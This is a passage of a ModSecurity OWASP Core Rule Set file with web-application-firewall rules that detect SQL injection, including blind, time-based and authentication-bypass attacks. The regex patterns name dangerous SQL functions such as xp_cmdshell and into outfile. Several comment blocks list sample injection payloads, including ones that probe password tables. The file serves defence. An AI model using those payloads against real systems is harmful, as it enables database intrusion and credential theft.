%{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # Blind SQL injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\.(db|user))|c(?:onstraint_type|harindex)|waitfor\b\W*?\bdelay|attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)|\b(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|xtype\W+\bchar|mb_users|rownum)\b|t(?:able_name\b|extpos\W+\()))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'Blind SQL Injection Attack',id:'950007',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # SQL injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv6|not_null|not|null|used_lock))?|n(?:et6?_(aton|ntoa)|s(?:ert|tr)|terval)?|f(null)?)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(date|time|timestamp)|p(?:datexml|per)|uid(_short)?|case|ser)|l(?:o(?:ca(?:l(timestamp)?|te)|g(2|10)?|ad_file|wer)|ast(_day|_insert_id)?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|t(?:ime(stamp|stampadd|stampdiff|diff|_format|_to_sec)?|o_(base64|days|seconds|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|a(?:dians|nd)|ight|trim|pad)|f(?:i(?:eld(_in_set)?|nd_in_set)|rom_(base64|days|unixtime)|o(?:und_rows|rmat)|loor)|a(?:es_(?:de|en)crypt|s(?:cii(str)?|in)|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|p(?:o(?:sition|w(er)?)|eriod_(add|diff)|rocedure_analyse|assword|i)|b(?:i(?:t_(?:length|count|x?or|and)|n(_to_num)?)|enchmark)|e(?:x(?:p(?:ort_set)?|tract(value)?)|nc(?:rypt|ode)|lt)|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|g(?:r(?:oup_conca|eates)t|et_(format|lock))|o(?:(?:ld_passwo)?rd|ct(et_length)?)|we(?:ek(day|ofyear)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|(rawton?)?hex(toraw)?|qu(?:arter|ote)|(pg_)?sleep|year(week)?|d?count|xmltype|hour)\W*\(|\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:sqlexec|sp_replwritetovarbin|sp_help|addextendedproc|is_srvrolemember|prepare|sp_password|execute(?:sql)?|makewebtask|oacreate)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|terminate|xp_servicecontrol|xp_ntsec_enumdomains|xp_terminate_process|e(?:xecresultset|numdsn)|availablemedia|loginconfig|cmdshell|filelist|dirtree|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|d(?:b(?:a_users|ms_java)|elete\b\W*?\bfrom)|group\b.*\bby\b.{1,100}?\bhaving|open(?:rowset|owa_util|query)|load\b\W*?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|print\b\W*?\@\@|cast\b\W*?\()|c(?:(?:ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)\W*\(|o(?:(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|alesce|t)\W*\(|llation\W*\(a))|d(?:(?:a(?:t(?:e(?:(_(add|format|sub))?|diff)|abase)|y(name|ofmonth|ofweek|ofyear)?)|e(?:(?:s_(de|en)cryp|faul)t|grees|code)|ump)\W*\(|bms_\w+\.\b)|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|\butl_inaddr\b|\bsys_context\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'950001',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\b(?i:having)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=<>]|(?i:\bexecute(\s{1,5}[\w\.$]{1,5}\s{0,3})?\()|\bhaving\b ?(?:\d{1,10}|[\'\"][^=]{1,10}[\'\"]) ?[=<>]+|(?i:\bcreate\s+?table.{0,20}?\()|(?i:\blike\W*?char\W*?\()|(?i:(?:(select(.*?)case|from(.*?)limit|order\sby)))|exists\s(\sselect|select\Sif(null)?\s\(|select\Stop|select\Sconcat|system\s\(|\b(?i:having)\b\s+(\d{1,10})|'[^=]{1,10}')" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959070',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:\bor\b ?(?:\d{1,10}|[\'\"][^=]{1,10}[\'\"]) ?[=<>]+|(?i:'\s+x?or\s+.{1,20}[+\-!<>=])|\b(?i:x?or)\b\s+(\d{1,10}|'[^=]{1,10}')|\b(?i:x?or)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=<>])" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959071',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i)\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[=]|\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')\s*?[<>]|\band\b ?(?:\d{1,10}|[\'\"][^=]{1,10}[\'\"]) ?[=<>]+|\b(?i:and)\b\s+(\d{1,10}|'[^=]{1,10}')" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959072',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!REQUEST_HEADERS:via "(?i:\b(?:coalesce\b|root\@))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,id:'950908',msg:'SQL Injection Attack.',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv6|not_null|not|null|used_lock))?|n(?:et6?_(aton|ntoa)|s(?:ert|tr)|terval)?|f(null)?)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(date|time|timestamp)|p(?:datexml|per)|uid(_short)?|case|ser)|l(?:o(?:ca(?:l(timestamp)?|te)|g(2|10)?|ad_file|wer)|ast(_day|_insert_id)?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|t(?:ime(stamp|stampadd|stampdiff|diff|_format|_to_sec)?|o_(base64|days|seconds|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|a(?:dians|nd)|ight|trim|pad)|f(?:i(?:eld(_in_set)?|nd_in_set)|rom_(base64|days|unixtime)|o(?:und_rows|rmat)|loor)|a(?:es_(?:de|en)crypt|s(?:cii(str)?|in)|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|p(?:o(?:sition|w(er)?)|eriod_(add|diff)|rocedure_analyse|assword|i)|b(?:i(?:t_(?:length|count|x?or|and)|n(_to_num)?)|enchmark)|e(?:x(?:p(?:ort_set)?|tract(value)?)|nc(?:rypt|ode)|lt)|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|g(?:r(?:oup_conca|eates)t|et_(format|lock))|o(?:(?:ld_passwo)?rd|ct(et_length)?)|we(?:ek(day|ofyear)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|(rawton?)?hex(toraw)?|qu(?:arter|ote)|(pg_)?sleep|year(week)?|d?count|xmltype|hour)\W*?\(|\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*?\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:sqlexec|sp_replwritetovarbin|sp_help|addextendedproc|is_srvrolemember|prepare|sp_password|execute(?:sql)?|makewebtask|oacreate)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|terminate|xp_servicecontrol|xp_ntsec_enumdomains|xp_terminate_process|e(?:xecresultset|numdsn)|availablemedia|loginconfig|cmdshell|filelist|dirtree|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|d(?:b(?:a_users|ms_java)|elete\b\W*?\bfrom)|group\b.*?\bby\b.{1,100}?\bhaving|open(?:rowset|owa_util|query)|load\b\W*?\bdata\b.*?\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|print\b\W*?\@\@|cast\b\W*?\()|c(?:(?:ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)\W*?\(|o(?:(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|alesce|t)\W*?\(|llation\W*?\(a))|d(?:(?:a(?:t(?:e(?:(_(add|format|sub))?|diff)|abase)|y(name|ofmonth|ofweek|ofyear)?)|e(?:(?:s_(de|en)cryp|faul)t|grees|code)|ump)\W*?\(|bms_\w+\.\b)|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|\butl_inaddr\b|\bsys_context\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'8',capture,t:none,t:urlDecodeUni,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959073',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}" # # [ SQL Injection Character Anomaly Usage ] # # These rules attempted to gauge when there is an exccesive use of # meta-characters within a single parameter payload. # # The most likely false positive instances will be free-form text fields. # Adjust the the @ge operator value appropriately for your site. Increasing # the score will reduce false positives but may also decrease detection of # obfuscated attack payloads. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES "([\~\!\@\#\$\%\^\&\*\(\)\-\+\=\{\}\[\]\|\:\;\"\'\´\’\‘\`\<\>].*?){8,}" "phase:2,t:none,t:urlDecodeUni,block,id:'981172',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',msg:'Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded',capture,logdata:'Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESTRICTED_SQLI_CHARS-%{matched_var_name}=%{tx.0}" SecRule ARGS_NAMES|ARGS|XML:/* "([\~\!\@\#\$\%\^\&\*\(\)\-\+\=\{\}\[\]\|\:\;\"\'\´\’\‘\`\<\>].*?){4,}" "phase:2,t:none,t:urlDecodeUni,block,id:'981173',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',msg:'Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded',capture,logdata:'Matched Data: %{TX.1} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.sql_injection_score=+1,setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESTRICTED_SQLI_CHARS-%{matched_var_name}=%{tx.0}" # # -=[ PHPIDS - Converted SQLI Filters ]=- # # https://dev.itratos.de/projects/php-ids/repository/raw/trunk/lib/IDS/default_filter.xml # # # Example Payloads Detected: # ------------------------- # IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1)) # SELECT pg_sleep(10); # IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’; # select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); # ------------------------- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(sleep\((\s*?)(\d*?)(\s*?)\)|benchmark\((.*?)\,(.*?)\)))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects blind sqli tests using sleep() or benchmark().',id:'981272',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" # # Example Payloads Detected: # ------------------------- # ' or 1=1# # ') or ('1'='1-- # 1 OR \'1\'!=0 # aaa\' or (1)=(1) #!asd # aaa\' OR (1) IS NOT NULL #!asd # ' =+ ' # asd' =- (-'asd') -- -a # aa" =+ - "0 # aa' LIKE 0 -- -a # aa' LIKE md5(1) or '1 # asd"or-1="-1 # asd"or!1="!1 # asd"or!(1)="1 # asd" or ascii(1)="49 # asd' or md5(5)^'1 # \"asd" or 1="1 # ' or id= 1 having 1 #1 ! # ' or id= 2-1 having 1 #1 ! # aa'or BINARY 1= '1 # aa'like-'aa # ------------------------- # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?i:\d[\"'`´’‘]\s+[\"'`´’‘]\s+\d)|(?:^admin\s*?[\"'`´’‘]|(\/\*)+[\"'`´’‘]+\s?(?:--|#|\/\*|{)?)|(?:[\"'`´’‘]\s*?\b(x?or|div|like|between|and)\b\s*?[+<>=(),-]\s*?[\d\"'`´’‘])|(?:[\"'`´’‘]\s*?[^\w\s]?=\s*?[\"'`´’‘])|(?:[\"'`´’‘]\W*?[+=]+\W*?[\"'`´’‘])|(?:[\"'`´’‘]\s*?[!=|][\d\s!=+-]+.*?[\"'`´’‘(].*?$)|(?:[\"'`´’‘]\s*?[!=|][\d\s!=]+.*?\d+$)|(?:[\"'`´’‘]\s*?like\W+[\w\"'`´’‘(])|(?:\sis\s*?0\W)|(?:where\s[\s\w\.,-]+\s=)|(?:[\"'`´’‘][<>~]+[\"'`´’‘]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects basic SQL authentication bypass attempts 1/3',id:'981244',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:\sexec\s+xp_cmdshell)|(?:[\"'`´’‘]\s*?!\s*?[\"'`´’‘\w])|(?:from\W+information_schema\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\s*?\([^\)]*?)|(?:[\"'`´’‘];?\s*?(?:select|union|having)\s*?[^\s])|(?:\wiif\s*?\()|(?:exec\s+master\.)|(?:union select @)|(?:union[\w(\s]*?select)|(?:select.*?\w?user\()|(?:into[\s+]+(?:dump|out)file\s*?[\"'`´’‘]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MSSQL code execution and information gathering attempts',id:'981255',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:,.*?[)\da-f\"'`´’‘][\"'`´’‘](?:[\"'`´’‘].*?[\"'`´’‘]|\Z|[^\"'`´’‘]+))|(?:\Wselect.+\W*?from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*?\(\s*?space\s*?\())" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL comment-/space-obfuscated injections and backtick termination',id:'981257',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:@.+=\s*?\(\s*?select)|(?:\d+\s*?(x?or|div|like|between|and)\s*?\d+\s*?[\-+])|(?:\/\w+;?\s+(?:having|and|x?or|div|like|between|and|select)\W)|(?:\d\s+group\s+by.+\()|(?:(?:;|#|--)\s*?(?:drop|alter))|(?:(?:;|#|--)\s*?(?:update|insert)\s*?\w{2,})|(?:[^\w]SET\s*?@\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\|\||\&\&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`´’‘=()]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects chained SQL injection attempts 1/2',id:'981248',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2.80738585072007e-308|1e309)$))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Looking for intiger overflow attacks, these are taken from skipfish, except 2.2.80738585072007e-308 is the \"magic number\" crash',id:'981277',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:(select|;)\s+(?:benchmark|if|sleep)\s*?\(\s*?\(?\s*?\w+))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects SQL benchmark and sleep injection attempts including conditional queries',id:'981250',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\s()]case\s*?\()|(?:\)\s*?like\s*?\()|(?:having\s*?[^\s]+\s*?[^\w\s])|(?:if\s?\([\d\w]\s*?[=<>~]))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects conditional SQL injection attempts',id:'981241',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:alter\s*?\w+.*?character\s+set\s+\w+)|([\"'`´’‘];\s*?waitfor\s+time\s+[\"'`´’‘])|(?:[\"'`´’‘];.*?:\s*?goto))" "phase:2,capture,t:none,t:urlDecodeUni,block,msg:'Detects MySQL charset switch and MSSQL DoS attempts',id:'981252',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 